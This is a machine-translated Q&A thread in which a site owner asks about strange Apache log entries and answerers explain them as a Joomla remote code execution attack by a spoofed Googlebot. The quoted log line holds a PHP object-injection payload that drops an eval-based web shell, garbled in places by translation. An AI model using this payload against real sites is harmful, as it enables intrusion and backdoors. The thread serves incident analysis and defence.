Использовалась ли идентификация агента пользователя для некоторой техники атаки сценариев?


10

Записи журнала доступа Apache на моем сайте обычно выглядят так:

207.46.13.174 - - [31 / Oct / 2016: 10: 18: 55 +0100] "GET / contact HTTP / 1.1" 200 256 "-" "Mozilla / 5.0 (совместимо; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607

так что вы можете увидеть там поле user-agent. Но сегодня я также обнаружил, что поле user-agent используется так:

62.210.162.42 - - [31 / Oct / 2016: 11: 24: 19 +0100] "GET / HTTP / 1.1" 200 399 "-" "} __ test | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 : "FC"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers"; а: 1: {я: 0; а: 2: {я: 0; O: 9: "SimplePie": 5: {s: 8: "Sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "FEED_URL"; s: 242: "file_put_contents ($ _ SERVER [" DOCUMENT_ROOT» ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; if (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST [ 'г0']); @ Eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: GetConfig (); выход;"; s: 19:» cache_name_function "; s: 6:" утверждают "; s: 5:" кэш "; б: 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0connection "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0,304

Это была атака? Следующая запись журнала, по-видимому, успешно извлекла (код 200) файл, sqlconfigbak.phpупомянутый в сценарии. Хотя я не могу найти файл в файловой системе:

62.210.162.42 - - [31 / Oct / 2016: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (совместимо; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 БАЙПАС 10.10.36.125:104 0.244

Пожалуйста, что здесь происходит?

Ответы:


11

Это Joomla 0 Day Attack. Информация найдена здесь: https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

Это не тест на уязвимость, несмотря на __test. Это атака.

Убедитесь, что любая установка Joomla является как можно более актуальной.

Другой вариант - просто использовать .htaccess для перехвата этого эксплойта путем поиска общей строки, сработает «__test» и перенаправить в другое место.


4

IP-адрес, который вы указали, не разрешается в имя хоста Google, поэтому это не Google. Человек или бот сканирует ваш сайт на наличие уязвимостей. Первый пытается найти уязвимость Joomla.

Эти события являются регулярным явлением на большинстве веб-сайтов. Вы должны убедиться, что вы следуете передовым методам и укрепите свой веб-сайт, процесс длительный, и вам нужно будет найти и следовать онлайн-учебнику.


Хорошо спасибо. Я укрепил сайт еще до того, как нашел это. Честно говоря, обнаружение такого вектора атаки меня немного удивило.
Miroxlav

2

В дополнение к другим ответам, обратите внимание, что тот факт, что эта атака, очевидно, сработала, предполагает, что вы используете старую небезопасную версию PHP. Исправление для ошибки, которую использует эта атака, было выпущено в сентябре 2015 года. Запустите процесс обновления и убедитесь, что он использует самую последнюю версию PHP. И проверьте также другие устаревшие программы, которые работают с Интернетом, так как кажется, что ваш сервер не обновлялся как минимум год.


Чертовски хороший момент!
closetnoc
Используя наш сайт, вы подтверждаете, что прочитали и поняли нашу Политику в отношении файлов cookie и Политику конфиденциальности.
Licensed under cc by-sa 3.0 with attribution required.